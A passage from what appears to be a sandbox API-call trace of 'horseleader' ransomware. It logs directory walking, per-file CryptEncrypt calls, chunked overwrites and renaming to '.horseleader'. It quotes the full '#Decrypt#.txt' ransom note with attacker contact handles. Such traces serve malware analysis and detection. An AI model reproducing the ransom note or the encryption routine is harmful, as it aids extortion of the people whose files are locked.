vF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0248.316] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0248.316] CloseHandle (hObject=0x158) returned 1 [0248.317] GetProcessHeap () returned 0x780000 [0248.317] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.317] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54ce0b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x54ce0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x54ce0b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ENES", cAlternateFileName="")) returned 1 [0248.317] lstrcmpiW (lpString1="ENES", lpString2="Windows") returned -1 [0248.317] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES") returned 64 [0248.317] lstrcmpW (lpString1="ENES", lpString2=".") returned 1 [0248.317] lstrcmpW (lpString1="ENES", lpString2="..") returned 1 [0248.317] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0248.317] GetProcessHeap () returned 0x780000 [0248.317] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.317] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\*") returned 66 [0248.317] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54ce0b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x54ce0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x54ce0b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0248.319] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0248.319] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\.") returned 66 [0248.319] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0248.319] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54ce0b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x54ce0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x54ce0b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0248.319] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0248.319] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\..") returned 67 [0248.319] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0248.319] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0248.319] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c637800, ftCreationTime.dwHighDateTime=0x1c6e3e3, ftLastAccessTime.dwLowDateTime=0x54ce0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1c637800, ftLastWriteTime.dwHighDateTime=0x1c6e3e3, nFileSizeHigh=0x0, nFileSizeLow=0xeed1e, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="MSB1ENES.ITS", cAlternateFileName="")) returned 1 [0248.319] lstrcmpiW (lpString1="MSB1ENES.ITS", lpString2="Windows") returned -1 [0248.319] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS") returned 77 [0248.319] StrStrIW (lpFirst="MSB1ENES.ITS", lpSrch=".horseleader") returned 0x0 [0248.320] lstrcmpW (lpString1="MSB1ENES.ITS", lpString2="#Decrypt#.txt") returned 1 [0248.320] lstrcmpW (lpString1="MSB1ENES.ITS", lpString2="_uninstalling_.png") returned 1 [0248.320] lstrlenW (lpString=".testttjffg") returned 11 [0248.320] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS", lpSrch=".testttjffg") returned 0x0 [0248.320] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.320] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.320] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enes\\msb1enes.its"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.321] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS") returned 77 [0248.321] StrStrW (lpFirst="MSB1ENES.ITS", lpSrch=".txt") returned 0x0 [0248.321] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=978206) returned 1 [0248.321] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.321] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.325] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.325] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.327] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x74e8f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.327] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.329] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.329] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.330] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xe9d1e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.330] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.332] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.332] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.333] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.333] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.333] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.333] CloseHandle (hObject=0x1a4) returned 1 [0248.334] GetProcessHeap () returned 0x780000 [0248.334] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0248.334] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS.horseleader") returned 89 [0248.334] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enes\\msb1enes.its"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enes\\msb1enes.its.horseleader")) returned 1 [0248.335] GetProcessHeap () returned 0x780000 [0248.335] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0248.335] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c637800, ftCreationTime.dwHighDateTime=0x1c6e3e3, ftLastAccessTime.dwLowDateTime=0x54ce0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1c637800, ftLastWriteTime.dwHighDateTime=0x1c6e3e3, nFileSizeHigh=0x0, nFileSizeLow=0xeed1e, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="MSB1ENES.ITS", cAlternateFileName="")) returned 0 [0248.335] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0248.335] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\#Decrypt#.txt") returned 78 [0248.335] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enes\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.336] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0248.336] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0248.337] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0248.337] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0248.337] CloseHandle (hObject=0x158) returned 1 [0248.338] GetProcessHeap () returned 0x780000 [0248.338] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.338] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7562dd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7562dd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ENFR", cAlternateFileName="")) returned 1 [0248.338] lstrcmpiW (lpString1="ENFR", lpString2="Windows") returned -1 [0248.338] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR") returned 64 [0248.338] lstrcmpW (lpString1="ENFR", lpString2=".") returned 1 [0248.338] lstrcmpW (lpString1="ENFR", lpString2="..") returned 1 [0248.338] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0248.338] GetProcessHeap () returned 0x780000 [0248.338] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.338] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\*") returned 66 [0248.338] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7562dd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7562dd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0248.338] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0248.338] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\.") returned 66 [0248.338] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0248.339] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7562dd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7562dd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0248.339] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0248.339] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\..") returned 67 [0248.339] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0248.339] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0248.339] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c637800, ftCreationTime.dwHighDateTime=0x1c6e3e3, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1c637800, ftLastWriteTime.dwHighDateTime=0x1c6e3e3, nFileSizeHigh=0x0, nFileSizeLow=0xe64da, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="MSB1ENFR.ITS", cAlternateFileName="")) returned 1 [0248.339] lstrcmpiW (lpString1="MSB1ENFR.ITS", lpString2="Windows") returned -1 [0248.339] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS") returned 77 [0248.339] StrStrIW (lpFirst="MSB1ENFR.ITS", lpSrch=".horseleader") returned 0x0 [0248.339] lstrcmpW (lpString1="MSB1ENFR.ITS", lpString2="#Decrypt#.txt") returned 1 [0248.339] lstrcmpW (lpString1="MSB1ENFR.ITS", lpString2="_uninstalling_.png") returned 1 [0248.339] lstrlenW (lpString=".testttjffg") returned 11 [0248.339] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS", lpSrch=".testttjffg") returned 0x0 [0248.339] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.339] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.339] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enfr\\msb1enfr.its"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.340] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS") returned 77 [0248.340] StrStrW (lpFirst="MSB1ENFR.ITS", lpSrch=".txt") returned 0x0 [0248.340] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=943322) returned 1 [0248.340] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.340] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.343] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.344] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.345] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x70a6d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.345] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.347] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.347] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.348] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xe14da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.348] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.350] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.350] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.351] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.351] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.351] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.351] CloseHandle (hObject=0x1a4) returned 1 [0248.351] GetProcessHeap () returned 0x780000 [0248.351] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0248.351] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS.horseleader") returned 89 [0248.352] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enfr\\msb1enfr.its"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 